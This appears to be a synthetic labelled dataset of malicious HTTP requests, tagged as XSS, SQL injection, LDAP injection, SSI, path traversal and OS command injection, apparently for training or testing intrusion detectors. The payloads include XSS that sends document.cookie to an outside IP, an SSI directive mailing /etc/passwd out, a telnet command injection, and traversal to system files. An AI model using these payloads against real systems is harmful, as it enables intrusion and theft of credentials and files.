~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47355
Start - Id: 37826
class: LdapInjection
GET /6F/Hzwfgg9ranu9lLgo/rcpCVJyVND-MpxmlVaccess_logN/t.SaqubtCMO_DuTPZ/rCnesV0yQFZbtrQvN@/esylA9EmDhm5xj/se/tFgcelTg9n/kxnxqO9YUJS/SdllNderameor/ioV.js?i5se=ein&2ssLho=nEane%29%28%7C+++%28nmO%3D*%29 HTTP/1.0
Host: www.nhtat5da.net
Connection: close
Accept: audio/basic;q=0.4, image/*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: imsl-ferbner;q=0.6, asN0tN-ers;q=0.3
Cache-Control: only-if-cached
Client-ip: 61.159.20.181
Cookie: nklt=asuje;evozecoeqaH=4114211;ae5ns=N;p62egn8rdtefg=tcI6;toncrdbytaquor=2993635350;j9wgetTsS=6526805
Cookie2: $Version="74"
Date: Fri, 05 Nov 04 11:05:17 UTC
ETag: "Ob3LephYBYDp-6jiyC"
Expect: 100-continue
From: utTT@sw41.ch
If-Modified-Since: Wed, 27 May 09 06:51:16 CET
If-Unmodified-Since: Thu, 25 May 06 08:04:45 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 12 Feb 05 05:48:51 UTC
Max-Forwards: 525
MIME-Version: 6.6
Pragma: eL='i'
Proxy-Authorization: Digest uri=/newerY/iesL.bin
Authorization: eet7 ianHaao=dtbal
Range: 09106-2,27777-,7807-
Referer: /bihe.js
TE: deflate;q=0.6
Trailer: Host
User-Agent: hpWf3-x7Rd http://www.tbo26.it
UA-CPU: 68000
UA-Disp: 0815,794,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: FTP/7.0 www.lepme.htm, HTTP/3.7 162.134.129.149, 9.8 239.54.217.247
Transfer-Encoding: identity
Upgrade: twrizf/4.9, ra8dl/9.5
Warning: 166 78.105.41.24 "sewleo7lheo" "Tue, 16 Jun 09 20:36:56 UTC"
X-Forwarded-For: 178.127.38.107
X-Serial-Number: 839362517955093673
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37826
Start - Id: 47853
class: XSS
GET /i-liwEwsbVoB3xd6/NS-tmpXe9x88n7catWq/bes/znimoiei9rc8ar.dll?hsyihrgcOnveVat=kbrytt2ae&lmeaioeipspa=yytie0sir&ry2do=sIw5v4k_&6dcntupangareii=142800&7shesvr=%3Cimg++src++++%3D+++%22+++++javascript%3A+%5Bwindow.open%28%27http%3A%2F%2F239.203.37.101%2Fst.php4%27%2Bdocument.cookie%29%3B%5D%22++%3E&blueaB2dti=5392316848&aoEll5isSj=wkfJly&Rl=nj-+tiwte%3E3e08r&onerpHse2smsew=Hshutdown%28%24caxpaTy9l&big=s9bLsN&eh=y8j5cxNo1zX HTTP/1.1
Host: www.hhuolliT.ch:80
Connection: close
Accept: application/zip;q=0.0, image/*, video/quicktime;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 229.107.237.67
Cookie: eathw2=2endnfha5baUaao;6d=ajol;vyUlw=711982;eostdsaot0adeg=ilolwXy-f;xterm4-5=  a esIea0efu
Cookie2: $Version="459"
Date: Wed, 07 Oct 09 03:47:10 CET
ETag: W/"LURUItJivcqELL-hp6D3"
Expect: mrthhp=AsnbEEk;eeuvr
From: tioExt@xadhwC.ch
If-Modified-Since: Wed, 01 Jun 05 22:15:51 UTC
If-Unmodified-Since: Sat, 20 Mar 10 04:40:22 GMT
If-Match: "bpC.jAKUt2HkyzhoKik"
If-None-Match: *
If-Range: *
Max-Forwards: 3913
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: aibnm 3nd5Ean8=1Tde
Authorization: e0thui ljyE=ret4ga
Range: 595606-7,222673-07
Referer: /5bm3a1l/3n0athxc.gif
TE: deflate;q=0.8,trailers
Trailer: Trailer
User-Agent: Mozilla/6.0 (X11; U; SunOS sun4u 2.2; hl-ha; rv:0.3.9) Gecko/31900410
UA-CPU: x86
UA-Disp: 4309,162,32
Via: 7.9 www.tesnn.tiff:38
Transfer-Encoding: deflate
Upgrade: eceRm/0.3, e5aiw8/4.3, ahnzt/2.0
Warning: 626 136.170.222.193 "qysfxete3o" "Wed, 05 Sep 07 23:11:56 UTC"
X-Forwarded-For: 188.24.5.207
X-Serial-Number: 42043067553619454717
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47853
Start - Id: 42438
class: SqlInjection
GET /aaosdt0letohsnrxl/a5zy1VqAPtWbQz6COjSJ/tGpHbFLnUoN/boot.iniG@Lfrom8fhttpsztmpV/nimeuFeeo/ienEzqU/86acur/3@q1XDL/uD/heasRhm5e.cgi?cf5EeeMezrtoen=jJB%40gAtjzzD&4azt4q8eratkw=heO6&tlfLir=and+++0%3C%3E%28select++++count%28*%29++from+++++pe++where++++oehihwu%3C%3E%29&htenscv=irhnetheEnhi96&iehuknxuasfuc=ttstg HTTP/1.0
Host: www.eyidbrne.uk:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: euc-kr;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 240.161.64.35
Cookie: cruyna=sR;nFeDaoynpliR=ht)updatea;hiihf=34008;ksvblanu5p2ty=l;nIa]tTAdyui;atrc:;iyno=52718;X2Skg488d=kaodxAhhsro
Cookie2: $Version="2"
Date: Mon, 23 Jul 07 06:30:07 CET
ETag: W/"OW_oBv4XGNtza5TpHP"
Expect: 100-continue
From: hraer@erUscu.ch
If-Modified-Since: Sat, 22 Dec 07 09:03:45 UTC
If-Unmodified-Since: Thu, 30 Jun 05 09:11:11 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 23 Apr 06 24:55:53 UTC
Max-Forwards: 864
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Basic aHdkZWQ6dDVtbjYzb1M=
Authorization: Basic ZXllaVRoczY6bHNvM2k=
Range: 53-,-2932
Referer: /diwmzdea/toci/insD/hmez/nrneae.cfm
TE: chunked;q=0.5,gzip;q=0.5
Trailer: Authorization
User-Agent: lq8oootct
UA-CPU: PowerPC
UA-Disp: 807,741,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 028x6235
Via: 5.1 www.foetac.png, HTTP/6.6 109.95.108.194:0308
Transfer-Encoding: deflate
Upgrade: 5ues/5.0, s5cxlt/6.5
Warning: 292 www.ev6O.jpeg "hnt5llemsftyrettr" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42438
Start - Id: 39157
class: SSI
GET /tnixynhete/3ree5byaoNpwevnwTJg/HJ8wa0scriptZpFjv/Hhi/ypM.tiff?wgbgsoundnWyxallMM7=9&S0eV=36694&qia=xmla%3Cftp&rH=bdgiAn%3EAkSIex&C2ITqeGTEf0=ohxcandkEabbgsoundre%3A&iosas=08b&eab4jlb=e%28php+ HTTP/1.1
Host: 252.13.188.26:80
Connection: tf4my
Accept: */*
Accept-Encoding: 
Accept-Language: 8aybn-iitae;q=0.4, r-4Nxra2;q=0.7, rmh-aiNts1, testA2t-a, i-go
Cache-Control: no-cache
Cookie: yoii6eiize=-red;ihmtvuh22eween=<!--#echo var="date_gmt"-->;txemaa5l=rdeehntMsN;okahaprh=cwwW3gb7W_;RS5ofswUl1ineec=9tEo
Cookie2: $Version="280"
Date: Sat, 01 May 10 04:49:56 GMT
Referer: http://Lslxyew.st/yeo8a/t2et/6psiatH/ei4we.jsp
User-Agent: Mozilla/4.5 (X11; U; Linux i586 4.7; nA-is; rv:8.5.9) Gecko/77489817

null

End - Id: 39157
Start - Id: 44761
class: PathTransversal
GET /aD.QwACy-NEVvn8dAbS1.tiff?neaolseatttr=%7EetltTtmpntL6rr0Xfe&ddblBotuejn=inwiksVnvarlyo7i&yylFTwsgigeeNi2=tor9mprecwtsnib&Tc._null=07761595&depNT=edHhalpS8xpC&bred54hpr34do=761523&Dcmht7tseieeplo=doc%28file%3A%2F%2F%2Fc%3A%2Fpeea%2Fubtoetoy.xml%29&p1jewbRA=neSu&amrdeSaeuso2Ir=eS3xm3d_5bq&Ndptodsthi=mR8&gtriormsb1=uy0&PJ=o+inserto&Tnmh4woyannyiJ=aeoptiu4ohegids HTTP/1.0
Host: 210.42.136.15
Connection: close
Accept: text/plain;q=0.6, text/*
Accept-Charset: *
Accept-Encoding: identity, gzip, deflate;q=0.3, gzip
Accept-Language: a-etfsej
Cache-Control: no-cache
Client-ip: 245.254.197.131
Cookie: tM4tT=26706
Cookie2: $Version="28"
Date: Mon, 17 Apr 06 15:09:49 GMT
ETag: "cKTM@veD_AQ8rVtpE"
Expect: ammm
From: 6R4thu@ercn3stwaa.biz
If-Modified-Since: Sat, 08 Apr 06 07:12:10 UTC
If-Unmodified-Since: Tue, 20 Apr 10 22:58:36 GMT
If-Match: "nLzlg6vg.1un6f@my9"
If-None-Match: *
If-Range: Tue, 07 Mar 06 18:32:05 GMT
Max-Forwards: 50
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic c3FvaWFyOmVjT1ZzNW4=
Authorization: Digest uri=http://sfdqq.ch/w4oi39b/rt6erG/aaebraw1/ioSfdss.swf
Range: 79-,981-,-50
Referer: http://l5en.org/fraTDnxy/kdoe/tsnisn/fnFcs.sh
TE: deflate;q=0.0,trailers
Trailer: TE
User-Agent: Mozilla/6.8 (Machintosh; U; PPC Mac OS X 7.0; UO-es; rv:8.7.9) Gecko/38766429
UA-CPU: Sparc
UA-Disp: 4597,5625,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7624x8326
Via: 8.9 www.pMbidwa.png, FTP/5.1 155.210.49.19:690, 4.0 252.68.118.181
Transfer-Encoding: compress
Upgrade: ene/3.3, dnense/3.4, iDe8je/2.2, ecTeud/6.4, a7yhir/5.9
Warning: 777 www.ehusd6.shtml "Aader5almnIete" "Mon, 11 Feb 08 10:44:13 CET"
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 66520697255736682
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 44761
Start - Id: 39780
class: SSI
GET /f7ZLscriptL7ASIVRr/saqasjMetcususn/oz2hthn1dtOe/etspsousaomt/essso1q.jpg?pim=3861678&5orIwtuher38cu=%3C%21--++%23include++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++--%3E HTTP/1.1
Host: 69.101.112.210
Connection: keep-alive
Accept: audio/*;q=0.0
Accept-Charset: *
Accept-Encoding: identity;q=0.7, gzip;q=0.8, compress
Accept-Language: kb6-petce;q=0.9, aoh-tsoi, d-tJnetcg;q=0.0, kflwaS-ihFar;q=0.5
Cache-Control: no-cache
Client-ip: 211.6.11.10
Cookie: tgsmaeceuaenrd=dgr
Cookie2: $Version="35"
Date: Fri, 16 Jan 09 14:32:47 CET
ETag: W/"DTt6JelSuwDXAPxr"
Expect: ae0oP=nu1EYl;0lwbh5rr=kbremoe0
From: 6Rvlor@tljncre.cz
If-Modified-Since: Thu, 10 Jul 08 19:14:45 CET
If-Unmodified-Since: Fri, 28 Jul 06 20:20:08 UTC
If-Match: *
If-None-Match: "426_Sh8pxsrpEOS8v"
If-Range: Tue, 04 Aug 09 15:24:28 UTC
Max-Forwards: 3053
MIME-Version: 5.1
Pragma: ulerr='xdFetH'
Proxy-Authorization: aqmos h5eilr=rpma
Authorization: Basic a0h0MGVuMjQ6ZndUbnVnbg==
Range: 2208-72
Referer: http://9aiRplfi.cz/hTtevmu/mnun9a/rtia/uotrIs.tiff
TE: gzip;q=0.8,deflate,trailers
Trailer: Trailer
User-Agent: Mozilla/9.6 (compatible; ssesyhtoIz; Unix; n3uAmb; adajz7; Ject)
UA-CPU: 68000
UA-Disp: 168,5642,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 357x4433
Via: 5.2 www.ao19r.css:266, 4.4 159.209.116.197:34
Transfer-Encoding: wuin
Upgrade: Fcncth/8.5, tSieoY/0.0, qnbm/2.6, dla/6.1, tyuhob/1.6
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 127.158.27.136
X-Serial-Number: 544346041743957641
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39780
Start - Id: 40858
class: SSI
GET /agtaea0om/ffG9h47B33/hlu27PmCzEwJ/ogCmiHaS0/05catZZvoQbWiKr/oef/tnUQdy_1.php3?DluG=eAsoraz%27e%3Arot&khaKO7=ed&besoctht=%3C%21--++++%23odbc+++statement++++%3D++++%22select+++seamubmi%2C+++ai%2C++++we2esi+++from++dpO4qahjis++order+by+++++0%2C+++++332%2C++6%22++--%3E HTTP/1.1
Host: www.a9rdrn.st:850
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 9t-orY;q=0.1
Cache-Control: no-store
Client-ip: 183.188.60.40
Cookie: rsrtiTidim=577762008;GLHx6j6oJti1=krasigTxO4gO;noO5uos=5;n4awsbdtnex4=n?ne;hsino=nsthcNDPEyas;LlCrarechoGQhome=rcpps
Cookie2: $Version="05"
Date: Sun, 15 Jul 07 15:33:38 GMT
ETag: "l8YqCEbciYrBlazH.KJE"
Expect: ahutgh=Zrti
From: ednaAi@brso.de
If-Modified-Since: Fri, 13 May 05 10:08:37 GMT
If-Unmodified-Since: Sun, 07 Jun 09 08:50:26 UTC
If-Match: "rLXOf-sX4kvRuBhhDZ"
If-None-Match: "AMdJCXfSuBH4qsvW2"
If-Range: *
Max-Forwards: 21
MIME-Version: 2.6
Pragma: aErmoT='na'
Proxy-Authorization: NTLM b2xRbmFjZWVwOW41c28yYWxxZUw3Um1kaXJJdXNvZW5ubHZoZGU2ZG1hZ2ls
Authorization: Basic ZmVsb2Vtcjpuc3NlZWVhbA==
Range: 662370-,944629-04,749394-
Referer: http://www.wRti7wca.com/iwlm/bhRae.cgi
TE: trailers
Trailer: Date
User-Agent: Mozilla/7.3 (Machintosh; U; PPC 1.8; 6x-Jh; rv:5.2.6) Gecko/45768421
UA-CPU: x86
UA-Disp: 2426,7787,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5993x410
Via: 5.9 203.65.239.214:4
Transfer-Encoding: compress
Upgrade: iTdaap/8.9
Warning: 001 94.18.227.26 "tarnYgrgo4d" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 49586702317462
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40858
Start - Id: 43191
class: OsCommanding
GET /oR5uA5nhgiuhld4/d9/GVpCh0z/rIxW/aeh/inputPPSM@/lTnmjYcV4oyMQyqduJ5.shtml?do36xt9tytp=8&EWrrPT=noeAoao&msupbtia3rf=4429284711&2ceod=eVZNj&ina=71&a7tr=tKf&a0ecteirotnuly=749541122&rtuhhnR=i&aslltNh3o=e6_yWjQwBG&zdez=%22++++%3B+telnet++25.191.66.29+++80+++++%3B&as=%25h&ihdRRe=8&pruKLwget2Mv@=rLUf&hpasNbee=hYqqOL9 HTTP/1.1
Host: 183.240.159.48
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: compress, gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 174.221.219.110
Cookie: ev=2071855;DsLBG=426688;uk=50
Cookie2: $Version="045"
Date: Sat, 04 Nov 06 13:30:31 UTC
ETag: "gE.iO--EDoc3u98Y-ab"
Expect: 4attte
From: dsmHrei2@sentDlSn.biz
If-Modified-Since: Sat, 17 Jan 09 07:52:49 UTC
If-Unmodified-Since: Sat, 18 Oct 08 01:40:49 UTC
If-Match: *
If-None-Match: "SXd-ZzFmuLPOVweuIJ"
If-Range: Sun, 23 Nov 08 17:49:29 GMT
Max-Forwards: 7345
MIME-Version: 7.5
Pragma: dEubroim=tNapo
Proxy-Authorization: neeoh eyo1ad=huxteEf
Authorization: Digest username="sseEt"
Range: 3473-351,462906-
Referer: /nnltthrc/lrNr/1zes/hnmr/r8ro.ace
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/0.1 (Windows; U; Windows NT 2.2; to-1t; rv:4.9.1) Gecko/02332919
UA-CPU: StrongARM
UA-Disp: 1503,1276,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 953x846
Via: HTTP/0.5 www.RstLt5.js, 2.1 8.169.14.152
Transfer-Encoding: compress
Upgrade: hi11/1.2
Warning: 231 185.155.94.60 "irqgflweeiAamiop" "Wed, 29 Aug 07 04:28:35 CET"
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 5739795926736555
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43191
Start - Id: 36413
class: OsCommanding
GET /mlyLPxmlYDyA/Ed5CyiHdwdt/pkQYZ.h_9aJeP/oeESl/mS3gB5umZmbt/a2tsrttoIarh/eP7FpnLEtq45HgPBH5/iruegoseo0iynYuc/ifxDhag.swf?6BB1NWGRl=++eetEoAt8%5B5c+r&th=bulk++++insert+++++0yc++++from+%27pwdump.exe%27+++++++with++%28codepage%3D%27RAW%27++++%29 HTTP/1.0
Host: www.rAq3imscn.uk
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: t-5go;q=0.3
Cache-Control: no-transform
Client-ip: 133.214.196.239
Cookie: t3rtd9=stKIuvxI
Cookie2: $Version="16"
Date: Tue, 21 Jun 05 18:51:58 UTC
ETag: "3oiVqHGZpfVG5NuenSG"
Expect: 100-continue
If-Modified-Since: Sun, 23 May 04 21:56:53 CET
If-Unmodified-Since: Thu, 29 Apr 04 10:22:49 CET
If-Match: "uf@5i@C4Nvt3msDFd7y"
If-None-Match: "fSPHXRMjPU.XynlmrRPs"
If-Range: Sun, 24 Jan 10 04:14:10 CET
Max-Forwards: 7
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: NTLM bmlvMHVsbHB0bGNvbGF0aW5XYmphZW5MYXNvdGlvRXJBaGd3NGVmZ20=
Authorization: Basic ZTBpNlI6cmF4YTc=
Range: 15-,7348-823
Referer: /iu5m3hVw.asmx
TE: trailers,gzip;q=0.7
Trailer: From
User-Agent: Mozilla/3.9 (Machintosh; U; PPC Mac OS X 1.9; og-oj; rv:2.4.3) Gecko/75672655
UA-CPU: PowerPC
UA-Color: color16
UA-Pixels: 811x0670
Via: HTTP/5.2 131.19.139.57:0220, 8.3 www.reae.jpeg
Transfer-Encoding: deflate
Upgrade: ehax/0.1, twoX/5.2, amhin/1.7, Nyuis8/4.4, rta/1.3
Warning: 271 125.50.84.12 "ieans4Sb3nfr1aNeeTba" "Fri, 16 Dec 05 02:23:13 UTC"
X-Serial-Number: 3132284615
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36413
Start - Id: 45641
class: PathTransversal
GET /E-.php4?cl=79884&lSftpueYsI5a8o=mw&AWjLfR00qO9=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&esYoO=7qrAne HTTP/1.0
Host: 227.26.140.160:80
Connection: close
Accept: application/*;q=0.2, video/mpeg;q=0.2, text/*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 168.189.41.184
Cookie: 6t4D=+7
Cookie2: $Version="984"
Date: Wed, 23 Mar 05 06:26:27 CET
ETag: W/"uiNwMQd.pGn0zWNudmL"
Expect: 100-continue
From: f6eo@ixbm.net
If-Modified-Since: Mon, 17 Mar 08 07:36:13 GMT
If-Unmodified-Since: Tue, 09 Oct 07 13:54:33 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 26 Dec 08 15:47:27 GMT
Max-Forwards: 28
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: NTLM b2FhZG5ubmVzZTgwd1BHb2V0c2NpZXNiT2VtZXJhYXJvZXRuZnJhbWNhbw==
Authorization: ainqa 6ycv=LWatao
Range: -5753
Referer: /uTgWsi/apHdA1ss/eE0sadd8/ehzNh/iehmshe.png
TE: trailers,deflate;q=0.1,trailers
Trailer: Upgrade
User-Agent: izea (3Vn5wW9j; pVhED.; 0qhC3w66; stPzVgnjV; irI2Bd)
UA-CPU: Sparc
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 822x7787
Via: FTP/0.3 155.149.74.57, 7.1 231.102.98.153
Transfer-Encoding: ereo; stdc=syvrreos
Upgrade: 8mc5/8.9
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 6406326694
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45641
Start - Id: 48148
class: XSS
GET /hODXrnWy.huuAvyx90vG/xm4-P9x1myZ/4wlW7T4/ZhUusrChdLTm/fErgOg/fvDF/asv4oL.html?S8a=%3Cbody+++onload+%3D+%22%5Bwindow.open%28%27http%3A%2F%2F126.16.227.87%2Filli.mdb%27%2Bdocument.cookie%29%3B%5D+++++%22++%3E&mtGeit=141451&h7bert1sidote=nv7s HTTP/1.1
Host: www.N2aase.gov
Connection: ndsrhi
Accept: text/plain;q=0.7
Accept-Charset: gb2312;q=0.1, windows-1252, utf-8;q=0.8, windows-1253;q=0.2, x-mac-korean
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-transform
Cookie2: $Version="137"
Date: Fri, 30 Apr 04 21:21:32 CET
ETag: W/"VEmXtl7s15oFGnIxna"
From: etoe9@uoeb.st
If-Unmodified-Since: Wed, 29 Aug 07 03:27:19 CET
If-Match: "H1RdAYLo-D@-p5FgUF_B"
If-None-Match: *
If-Range: Fri, 16 Jan 09 17:29:27 UTC
Max-Forwards: 992
MIME-Version: 8.3
Pragma: no-cache
Referer: /r3at.mp3
TE: trailers,deflate;q=0.1
Trailer: Host
User-Agent: m5sncenf
Via: lt9/3.4 180.217.34.42, 7.9 www.TlellTu.shtml:759, 5.4 37.182.103.61
Transfer-Encoding: gzip
Warning: 439 www.QtRf.js "tgeri" "Fri, 24 Nov 06 11:59:29 CET"

null

End - Id: 48148
Start - Id: 36936
class: LdapInjection
POST /zjR/iVw39xSLPdWLo21am/-IBinformlgjOJenetcat/ftpdTeL_TFp/hespa8StzsonSntroda.asp? HTTP/1.1
Content-Length: 141
Content-Language: te,pasr6jEE
Content-Encoding: deflate
Content-Location: http://www.akttMy.uk/aCceOa/82irt/otatNT.swf
Content-MD5: bGVkdWVyN2xwYXJkZm1jbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 27 May 07 05:57:46 GMT
Last-Modified: Sun, 07 Nov 04 19:31:59 CET
Host: www.ne7eisoems.de:15
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.4
Accept-Language: mluaAR-e, gasEde-ae6e, e-tatrvx;q=0.4
Cache-Control: max-age=6
Client-ip: 13.68.3.180
Cookie: 9mstr98jTnodmdr=nKat rcpO;zuf4wny5gBpepy=?3Sinh;rahirpsrulqset=5347749;EWBA1QxUxJv=9s;8ttsaw5rei=089
Cookie2: $Version="1"
Date: Sat, 22 Aug 09 03:57:40 UTC
ETag: W/"VLYpnQMTVayQbUA@8m@f"
Expect: 100-continue
From: nareu4te@pple4n.it
If-Modified-Since: Tue, 30 Jan 07 24:04:59 UTC
If-Unmodified-Since: Fri, 13 Aug 04 23:34:59 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 76
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic NG9lYWFkZTM6b25zZXhzdGM=
Authorization: letuea twhinkhx=ohaif
Range: 21-,49196-
Referer: http://tHyngtdN.ch/jfoeqeu/ffkhtzht/ryh8n/Iiufaes/erhT.pdf
TE: chunked,trailers
Trailer: Accept
User-Agent: yevis (iO2yZ@7dfZ; 0FZ4YkWnHX; o6J66K; o7Jblips; iHpb1Tcz9E)
UA-CPU: PowerPC
UA-Disp: 1845,7989,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 015x0585
Via: 8.7 133.129.254.83, 8.7 225.162.81.219, FTP/0.8 www.Tai5ed0.htm
Transfer-Encoding: anaeip; aruqea=n4he0rf9
Upgrade: bnd/1.0, Soltt/0.3, thel6o/5.8, isuyna/8.9
Warning: 200 169.156.209.196:92 "0oiSeraRieyyto" "Thu, 26 Aug 04 15:57:50 UTC"
X-Forwarded-For: 76.215.12.133
----: --------------------------------------
~~~~~: ~~~~~~~~~~

G67position0nJ7=tFZO@PFV6Z&YdnXx9R_=2&hlRi6blt=nDC3zX32@w8U&mralo=")(targetfilter=(o=NetscapeRoot))&eNenttje=gbZ&TkcpU=hD

End - Id: 36936
Start - Id: 42723
class: SqlInjection
PUT /lzC4.R8-MiMli.shtml? HTTP/1.1
Content-Length: 112
Content-Language: reeAnimx,krr,ehl
Content-Encoding: deflate
Content-Location: /twl6iay/8editsf.tiff
Content-MD5: dGxhZnVpYW52c2ZlaU9iTw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Apr 08 05:40:55 GMT
Last-Modified: Sat, 24 May 08 10:25:54 GMT
Host: www.deepo.de
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 56.100.234.243
Cookie: niestttftesx4r=einclude0ejReurwgettai1o2a;sdtdJiweenezS=tWGB
Cookie2: $Version="5"
Date: Sat, 22 Dec 07 02:18:46 UTC
ETag: "CO6efCdL@zR26C6Ui"
Expect: essolao=hhhzot8;I7ehiiC7=oXre
From: rwrhot@o8Obe7p.gov
If-Modified-Since: Wed, 12 Sep 07 18:04:15 GMT
If-Unmodified-Since: Sun, 19 Jul 09 02:18:40 CET
If-Match: "Pg0Y4oaloLLsxUsFCYp"
If-None-Match: *
If-Range: Wed, 19 Dec 07 06:43:43 GMT
Max-Forwards: 31
MIME-Version: 4.6
Pragma: tNva='rssr'
Proxy-Authorization: Basic YWx0cGU6NnR2Y1V3
Authorization: Basic UzZzdW5JaWM6ZWt0cw==
Range: 8234-,0500-05,1-
Referer: http://www.hAKE.biz/rt79.wav
TE: trailers,trailers
Trailer: Host
User-Agent: and   0<>(select  count(*) from  h9earox where     bete<>)
UA-CPU: Sparc
UA-Disp: 514,1320,16
UA-Color: color32
UA-Pixels: 3677x3061
Via: tpota/9.6 93.51.157.93, FTP/2.0 133.166.181.86, 1.3 www.tI2wnns.gif
Transfer-Encoding: gzip
Upgrade: voFoet/7.8, oRnfo/8.0
Warning: 048 www.8soqun3o.shtml:67 "3rotytraaa" "Thu, 25 Jun 09 14:12:23 GMT"
X-Serial-Number: 123099568526
----: --------------------------------------

TqechoxQ=1596&dEnm=51ooiiattnaeune&geesf=oD66&as=aXtqH7jwVYi&rmsiuwcma=eodiv5&ed@W9OHP=86451489&sqtmamv3iet=~e

End - Id: 42723
Start - Id: 39888
class: SSI
GET /ckUHqOAv.3/ixRcgE8oOam_/g9o9htu5Ine7hmtdrtTa/90ttefR6c/dUbCzjZPkmlSSQHmm30/ecykAXoYtHhpXV/n.WIIXl2vJlYO1PT.bin?REIK1CCaPaccess_loge=hCi0QIC1bfa&fecine=irbm&xoJr0tyeubbo=rbcopy HTTP/1.0
Host: 80.236.244.18:2
Connection: aEcn
Accept: audio/x-wav, application/zip;q=0.5, audio/*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: z1gnd-fyoshsa, Eesn-y;q=0.2
Cache-Control: min-fresh=1
Cookie: Bh7ledepehuls=<!--    #exec  cmd="/bin/mail  mehhsDnns.com    <     /etc/passwd"-->;qwuAbodygroup byp=connectfolikedyu
Cookie2: $Version="935"
Date: Sun, 21 Aug 05 22:19:53 UTC
ETag: W/"_AbJH3RsOkikMZrY"
Expect: 100-continue
From: eiufsni@o0d57ab.fr
If-Modified-Since: Thu, 12 Oct 06 22:52:35 GMT
If-Unmodified-Since: Thu, 08 Feb 07 04:16:19 UTC
If-Match: "ta5glVPtwU65GWT3Ac"
If-None-Match: "Z7kRVkakD0dBR@E"
If-Range: *
Max-Forwards: 5923
MIME-Version: 8.5
Pragma: noasdwfe='omeYsw'
Proxy-Authorization: Digest cnonce="fyeociug"
Authorization: Digest response="06c45ee406EeFf65285ea2AdFecBf554"
Range: 927-
Referer: /peBi/Wexrhgx/firyezyr/vDorns2/Chte.bin
TE: gzip,deflate;q=0.6,trailers
Trailer: From
User-Agent: aidt0iEp/6.1
UA-CPU: StrongARM
UA-Disp: 691,3454,8
UA-Color: color32
UA-Pixels: 444x147
Via: p7o/1.3 www.lkeewdaa.js, 3.4 www.oa4t.gif
Transfer-Encoding: gzip
Upgrade: srnf48/8.0, ao0/4.6
Warning: 114 88.236.185.50 "divtciTnse" 

null

End - Id: 39888
Start - Id: 40670
class: SSI
GET /ld/e3W_vhL1BXs6/r.2j/eFNeBc.ubEz/rriepsbaod/ySL4oX9wSJoaM12fPa.dll?b4esee0Eu=bH%3D&afr=80591731&do=184210&heheulremw=uniondshutdownoRhanS6ehfrom&bSuerci=664883&ssiFlaerYNwaeTl=%3C%21--%23include+++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22--%3E&riEwaodr8N=0&sthmil8aqrs=txKZXmMwo&3ie4n7u=eeQ9ihaahowri7aOer&aRNYEA=prema&ef=7Ci%2F5tioeer&yioeRsn=hk&piN=5 HTTP/1.1
Host: 226.141.215.1
Connection: keep-alive
Accept: text/*;q=0.3, audio/*
